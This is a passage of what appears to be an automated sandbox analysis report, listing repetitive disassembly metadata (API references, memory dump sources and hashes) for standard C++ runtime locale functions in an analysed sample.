                                                                  • Instruction Fuzzy Hash: D5118E56A1063587CB302F6CA800376A2E4DF50754F6548BFE88DDB391EAF98CC18394
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Maklocstr$Maklocchr
                                                                  • String ID:
                                                                  • API String ID: 2020259771-0
                                                                  • Opcode ID: 75039ecfe63db4079116fa53f77d53b71aceda7ee8d8d86c9e21e9b459d762b8
                                                                  • Instruction ID: 15bfc53490fd6fc6df991da00b12a20b058d5b78bcf88a4d187c88e14e559faa
                                                                  • Opcode Fuzzy Hash: 75039ecfe63db4079116fa53f77d53b71aceda7ee8d8d86c9e21e9b459d762b8
                                                                  • Instruction Fuzzy Hash: BF11A0B2940794BFE720DBA9C881F12B7ECEF04350F280999F649CBA41D275FC5087A9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B2D883
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2D88D
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • numpunct.LIBCPMT ref: 00B2D8C7
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B2D8DE
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2D8FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                  • String ID:
                                                                  • API String ID: 743221004-0
                                                                  • Opcode ID: 997f840934198602fd2e2522f257cec440d9961bae2683d9002c80b2369e3af5
                                                                  • Instruction ID: 4eca31e01553ec6d2eb32eca6f5ca3fae05dccc11efecd11d42ebeb15338c6dd
                                                                  • Opcode Fuzzy Hash: 997f840934198602fd2e2522f257cec440d9961bae2683d9002c80b2369e3af5
                                                                  • Instruction Fuzzy Hash: A411CE35900229DFCB08FB64A8616BE77F0FF84710F240499E4186B291CF749E008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32301
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3230B
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • codecvt.LIBCPMT ref: 00B32345
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3235C
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3237C
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                  • String ID:
                                                                  • API String ID: 712880209-0
                                                                  • Opcode ID: bf5024d4c414189240e9fa81042a38ea7b751166e347da3813682fa6242e924a
                                                                  • Instruction ID: 6151922555fd80fd301542f3c580e4af2a09c4dd32635290952439368df75fdb
                                                                  • Opcode Fuzzy Hash: bf5024d4c414189240e9fa81042a38ea7b751166e347da3813682fa6242e924a
                                                                  • Instruction Fuzzy Hash: 1001AD359001299FCB15AB64A851ABEB7F1AF84B20F240589E518AB291CF789E008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32396
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B323A0
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • codecvt.LIBCPMT ref: 00B323DA
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B323F1
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32411
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                  • String ID:
                                                                  • API String ID: 712880209-0
                                                                  • Opcode ID: 856d80a25d254a0ad933c5039299c814f2bfd186e8a14e82cdea29088eb2f7d2
                                                                  • Instruction ID: 9d0533c98a7f3bf42f3e15bce01f766fb7e9c698d44adcb515704eea0c5b4927
                                                                  • Opcode Fuzzy Hash: 856d80a25d254a0ad933c5039299c814f2bfd186e8a14e82cdea29088eb2f7d2
                                                                  • Instruction Fuzzy Hash: 38010C32A00129DFCB04EB6498516BEB7F0FF84B20F380488E5196B2D1CFB89E44CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B324C0
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B324CA
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • collate.LIBCPMT ref: 00B32504
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3251B
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3253B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                  • String ID:
                                                                  • API String ID: 1007100420-0
                                                                  • Opcode ID: 49716626864c88f18a6b621498ccd982c81bd39db475c3ddf9cdb11a5d14c002
                                                                  • Instruction ID: 891039dd8b435a6e997bf09db1b3415693e49923a555df53cb91ef0083267695
                                                                  • Opcode Fuzzy Hash: 49716626864c88f18a6b621498ccd982c81bd39db475c3ddf9cdb11a5d14c002
                                                                  • Instruction Fuzzy Hash: DE01C031901129DBCB05EB64E8556BEB7F0FF94720F350489E5146B291CF749F408B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B3242B
• std::_Lockit::_Lockit.LIBCPMT ref: 00B32435
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• collate.LIBCPMT ref: 00B3246F
• std::_Facet_Register.LIBCPMT ref: 00B32486
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B324A6
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
• String ID:
• API String ID: 1007100420-0
• Opcode ID: ca7e612f7e1027b65902dd1ee16b4071801e100a6e5153f2ec03f4454af7eb4d
• Instruction ID: ceaba4a995b7eb393a18210a6eb3a36ddde2e63ac603ef73ce056a1f8fa55cd4
• Opcode Fuzzy Hash: ca7e612f7e1027b65902dd1ee16b4071801e100a6e5153f2ec03f4454af7eb4d
• Instruction Fuzzy Hash: C201AD35900129DBCB01AB64E8516BEBBF0AF84720F380489E5156B391DFB49E00CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B325EA
• std::_Lockit::_Lockit.LIBCPMT ref: 00B325F4
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• messages.LIBCPMT ref: 00B3262E
• std::_Facet_Register.LIBCPMT ref: 00B32645
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B32665
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
• String ID:
• API String ID: 2750803064-0
• Opcode ID: 3b31f5a75a5a47b53d977e3d3419ed5bddf843166ff0b9813704297aff99a519
• Instruction ID: 6d9debaeec9d0814ddff32093b10cd729699ca70312d36f2ac2e303b5915ad4a
• Opcode Fuzzy Hash: 3b31f5a75a5a47b53d977e3d3419ed5bddf843166ff0b9813704297aff99a519
• Instruction Fuzzy Hash: D501C0359001299BCB01EB649822ABEB7F0FF94710F244489F4156B291CF749E00CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B32555
• std::_Lockit::_Lockit.LIBCPMT ref: 00B3255F
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• ctype.LIBCPMT ref: 00B32599
• std::_Facet_Register.LIBCPMT ref: 00B325B0
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B325D0
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
• String ID:
• API String ID: 83828444-0
• Opcode ID: d5083220fce01bdaa7a0978498b3c9256264263995be9685c4a05a25ad9f6db1
• Instruction ID: 8d84522df08e821f2870e6b422509bdf34c9fe7f163c3d10f17b57abfe101855
• Opcode Fuzzy Hash: d5083220fce01bdaa7a0978498b3c9256264263995be9685c4a05a25ad9f6db1
• Instruction Fuzzy Hash: 7401A9329011299BCB05AB649865AAEB7F0BF94720F290489E419AB2D2DF749F448B91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B2D6C4
• std::_Lockit::_Lockit.LIBCPMT ref: 00B2D6CE
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• codecvt.LIBCPMT ref: 00B2D708
• std::_Facet_Register.LIBCPMT ref: 00B2D71F
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B2D73F
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
• String ID:
• API String ID: 712880209-0
• Opcode ID: 3c2bfca06814954ad0095a086ca299cbe859d8d9760f33be8fae29384455d87e
• Instruction ID: f216c860af85c546f289dff36862396d41d28dbe48b58050af102f854d9bf6a1
• Opcode Fuzzy Hash: 3c2bfca06814954ad0095a086ca299cbe859d8d9760f33be8fae29384455d87e
• Instruction Fuzzy Hash: BC0180359101299BCB15FB64A851ABE77F1FF84721F240589E4186B292CF789E418791
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B3267F
• std::_Lockit::_Lockit.LIBCPMT ref: 00B32689
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• messages.LIBCPMT ref: 00B326C3
• std::_Facet_Register.LIBCPMT ref: 00B326DA
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B326FA
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
• String ID:
• API String ID: 2750803064-0
• Opcode ID: 329d1742e92d40130efdbfabda965c5e950103c759a309fae538b0c1ad96b325
• Instruction ID: 618d6440c26934efb7c93e462eaaafd23ee8a7c8510e27ea1f0b375b602d4c99
• Opcode Fuzzy Hash: 329d1742e92d40130efdbfabda965c5e950103c759a309fae538b0c1ad96b325
• Instruction Fuzzy Hash: 0E01CC36910129DFCB05FBA4D852ABEB7F0FF84720F284489E5186B291CFB49E018B91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B3E8DF
• std::_Lockit::_Lockit.LIBCPMT ref: 00B3E8E9
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• messages.LIBCPMT ref: 00B3E923
• std::_Facet_Register.LIBCPMT ref: 00B3E93A
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B3E95A
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
• String ID:
• API String ID: 2750803064-0
• Opcode ID: 983ab9e5d47e5ec0b8f63195dc447f6a78caf096343024ba3a959f62f523b6d9
• Instruction ID: 5bac0020d55aa57e345eaf6a71c483d603cb3ea8ca1333d7b7ac93075eef4db2
• Opcode Fuzzy Hash: 983ab9e5d47e5ec0b8f63195dc447f6a78caf096343024ba3a959f62f523b6d9
• Instruction Fuzzy Hash: 020180369001299FCB15EB649855ABE77F1FF84720F29068AF5286B2D1CF74DE008791
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B3E84A
• std::_Lockit::_Lockit.LIBCPMT ref: 00B3E854
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• collate.LIBCPMT ref: 00B3E88E
• std::_Facet_Register.LIBCPMT ref: 00B3E8A5
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B3E8C5
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
• String ID:
• API String ID: 1007100420-0
• Opcode ID: ee9c25c7b7aacadfb466cf43e66a1585a0be523c43b4f1052451b38ad6f67e8a
• Instruction ID: bff6490bef891528132c7fc3db5315098fed8c88970b03582eee780bfdfa8ee7
• Opcode Fuzzy Hash: ee9c25c7b7aacadfb466cf43e66a1585a0be523c43b4f1052451b38ad6f67e8a
• Instruction Fuzzy Hash: 0301AD36D001299BCB05FB6498116AEB7F0FF84710F24448AE4246B2D1CF749E00CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B329FD
• std::_Lockit::_Lockit.LIBCPMT ref: 00B32A07
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• moneypunct.LIBCPMT ref: 00B32A41
• std::_Facet_Register.LIBCPMT ref: 00B32A58
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B32A78
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
• String ID:
• API String ID: 419941038-0
• Opcode ID: 2cba51b2687b16d28a3399cbbf544c4666b3b1b7454221e978688660bcf678b7
• Instruction ID: 1a89eaffebaa5f92e56c7744c1ebfba81c9860ad6f205c092af571a430d2b092
• Opcode Fuzzy Hash: 2cba51b2687b16d28a3399cbbf544c4666b3b1b7454221e978688660bcf678b7
• Instruction Fuzzy Hash: 6701C035900129DBCB11EBA4D8516BEB7F1FF84720F340489E5146B291CF749E018791
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B32968
• std::_Lockit::_Lockit.LIBCPMT ref: 00B32972
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• moneypunct.LIBCPMT ref: 00B329AC
• std::_Facet_Register.LIBCPMT ref: 00B329C3
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B329E3
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
• String ID:
• API String ID: 419941038-0
• Opcode ID: 2dd4b9739a82485e49d63adc3f0171921b6d48f252d6ecafd1ca7acf427e250d
• Instruction ID: 71e958beda0dad02b511b2bfa265525b86c3fde1999da43509f35bba42aedb42
• Opcode Fuzzy Hash: 2dd4b9739a82485e49d63adc3f0171921b6d48f252d6ecafd1ca7acf427e250d
• Instruction Fuzzy Hash: 3801C031900129DBCB01EB64D812ABEB7F0FF84720F250599E5146B291CF749E008B91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B3EA9E
• std::_Lockit::_Lockit.LIBCPMT ref: 00B3EAA8
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• moneypunct.LIBCPMT ref: 00B3EAE2
• std::_Facet_Register.LIBCPMT ref: 00B3EAF9
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B3EB19
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
• String ID:
• API String ID: 419941038-0
• Opcode ID: 69ec42b5e914625778a0eb25f19c611e8f7aa10033252a791dcaa21f3a59039e
• Instruction ID: a12f8b9fddd96a81f143633d5748d929734cab47d3f8804802b0153e71291788
• Opcode Fuzzy Hash: 69ec42b5e914625778a0eb25f19c611e8f7aa10033252a791dcaa21f3a59039e
• Instruction Fuzzy Hash: 6A01A9329001299BCB11AB649851AAEB7F1FF84720F28048AF4296B2D2DF749E018B91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B32A92
• std::_Lockit::_Lockit.LIBCPMT ref: 00B32A9C
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• moneypunct.LIBCPMT ref: 00B32AD6
• std::_Facet_Register.LIBCPMT ref: 00B32AED
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B32B0D
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
• String ID:
• API String ID: 419941038-0
• Opcode ID: f35deb63aba556823ff4e1592c24e164bb4597e566c6e7d1ecfa55a7448818b1
• Instruction ID: 960945c576e35c6723aaaae8e3c5c7b8e712acf963ab6b140426a53a5c1cac00
• Opcode Fuzzy Hash: f35deb63aba556823ff4e1592c24e164bb4597e566c6e7d1ecfa55a7448818b1
• Instruction Fuzzy Hash: 9601C031900129DFCB15FB6498516BEB7F1FF84720F284889E518AB292DF749E00CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B32B27
• std::_Lockit::_Lockit.LIBCPMT ref: 00B32B31
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• moneypunct.LIBCPMT ref: 00B32B6B
• std::_Facet_Register.LIBCPMT ref: 00B32B82
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B32BA2
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
• String ID:
• API String ID: 419941038-0
